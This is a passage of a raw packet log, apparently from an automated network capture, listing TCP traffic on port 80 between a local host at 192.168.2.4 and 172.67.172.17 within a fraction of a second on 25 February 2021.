                                                                                                              Feb 25, 2021 15:10:41.317336082 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.317364931 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.317406893 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.317433119 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.317436934 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.317470074 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.317522049 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.318136930 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.318226099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.318250895 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.318269968 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.318275928 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.318295956 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.318321943 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.318351984 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.318953991 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.318984985 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319029093 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319041967 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.319053888 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319072008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319138050 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.319806099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319830894 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319854975 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319856882 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.319901943 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.319907904 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.319955111 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320017099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.320593119 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320640087 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320667028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320688009 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.320693016 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320718050 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320741892 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.320758104 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.320781946 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.321564913 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.321593046 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.321614981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.321640968 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.321643114 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.321666002 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.321688890 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.321690083 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.321739912 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.322585106 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322674036 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322698116 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322722912 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322734118 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.322747946 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322772980 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322788000 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.322801113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.322818995 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.323357105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323657990 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323683977 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323709011 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323735952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323738098 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.323761940 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323766947 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.323786974 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.323798895 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.324671984 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324697971 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324722052 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324744940 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324757099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.324769974 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324784040 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.324795961 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.324805975 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.325625896 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325650930 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325675964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325704098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325717926 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.325752020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325778008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.325779915 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.325795889 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.326622963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326658010 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326678038 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326694012 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.326698065 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326719999 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326723099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.326741934 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.326772928 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.327564001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327595949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327615976 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327634096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.327640057 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327662945 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327677011 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.327685118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.327732086 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.328532934 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328562021 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328582048 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328597069 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.328603983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328624964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328629017 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.328645945 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.328661919 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.329497099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329531908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329555035 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329572916 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.329575062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329596043 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329600096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.329616070 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.329632044 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.330492020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330522060 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330547094 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330564022 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.330569029 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330590963 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.330591917 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330614090 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.330635071 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.331301928 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331338882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331363916 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.331367970 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331397057 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331409931 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.331425905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331455946 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.331471920 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.332257986 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332309008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332319975 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.332343102 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332372904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332387924 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.332408905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332441092 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.332457066 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.333179951 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333225965 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333251953 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.333255053 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333283901 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333303928 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.333311081 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333343983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.333357096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334065914 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334095001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334119081 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334137917 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334140062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334163904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334173918 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334188938 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334228992 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334937096 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334969044 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.334981918 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.334994078 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335017920 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335042000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335045099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335064888 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335091114 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335832119 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335861921 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335886002 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335906029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335911989 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335937023 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335958958 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.335961103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.335983038 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.336715937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336745024 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336772919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336795092 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.336797953 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336817026 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.336822033 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336847067 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.336879015 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.337588072 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337618113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337641954 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337656021 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.337666035 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337683916 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.337691069 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337718010 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.337734938 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.338430882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338462114 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338484049 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338494062 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.338506937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338530064 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.338531971 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338555098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.338578939 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.339296103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339330912 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339354992 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339361906 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.339375973 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339391947 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.339399099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339421988 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.339448929 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.340140104 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340177059 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340200901 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340221882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340221882 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.340245962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340255022 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.340267897 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.340320110 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.341037035 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341068983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341093063 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341103077 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.341115952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341131926 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.341140985 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341162920 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341200113 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.341820955 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341850042 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341877937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341902018 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341907024 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.341924906 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341926098 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.341947079 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341972113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.341975927 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.342022896 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.342832088 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.342863083 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.342881918 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.342905998 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.342924118 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.342928886 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.342957973 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.342973948 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343014002 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343041897 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343542099 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343574047 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343597889 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343621969 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343640089 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343645096 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343667984 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343669891 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343689919 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343713999 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343718052 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343736887 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343761921 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343779087 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343786955 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343810081 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343821049 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343833923 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343854904 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343863964 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343878031 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343900919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343908072 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343921900 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343934059 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.343944073 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343983889 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.343986034 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.344006062 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.344027042 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.344043016 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.344050884 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.344086885 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.431864023 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.486171007 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.502985001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503005981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503024101 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503041983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503065109 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503073931 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.503082991 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503099918 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503115892 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503132105 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503135920 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.503149033 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503170967 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503180027 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.503218889 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.503942013 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503966093 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.503979921 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.504026890 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.504049063 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.504189968 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.504209042 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.504220963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.504236937 CET8049731172.67.172.17192.168.2.4
